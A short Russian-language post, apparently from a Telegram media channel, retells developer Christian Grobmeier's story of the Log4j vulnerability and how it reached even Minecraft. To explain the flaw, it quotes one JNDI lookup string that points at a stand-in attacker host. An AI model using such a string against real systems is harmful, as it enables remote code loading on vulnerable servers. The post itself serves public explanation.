Уязвимость Log4j и её влияние на интернет, мнение Кристиана Гробмайера

Как уязвимость в Java-библиотеке Log4j сломала половину интернета. Рассказывает разработчик Кристиан Гробмайер.

Log4j — распространенная библиотека для логирования. Ее используют корпоративные сервисы, правительственные системы и даже Minecraft.

Суть проблемы: приложению достаточно было записать строку вида ${jndi:ldap://attacker.example/a} — и злоумышленники получали возможность загрузить любой вредоносный код на сервер.

Теоретическая уязвимость приобрела глобальный характер. Пока Гробмайер работал над ее устранением, сын попросил «починить Minecraft» – на экране появилось предупреждение «У нас проблемы из-за дыры в безопасности Log4j». Тогда стало ясно: уязвимость добралась даже до детской игры и может затронуть половину интернета.

Полная история: https://www.youtube.com/watch?v=t74ClffSUW0

Подписывайтесь на Telegram Тайпспейс Медиа.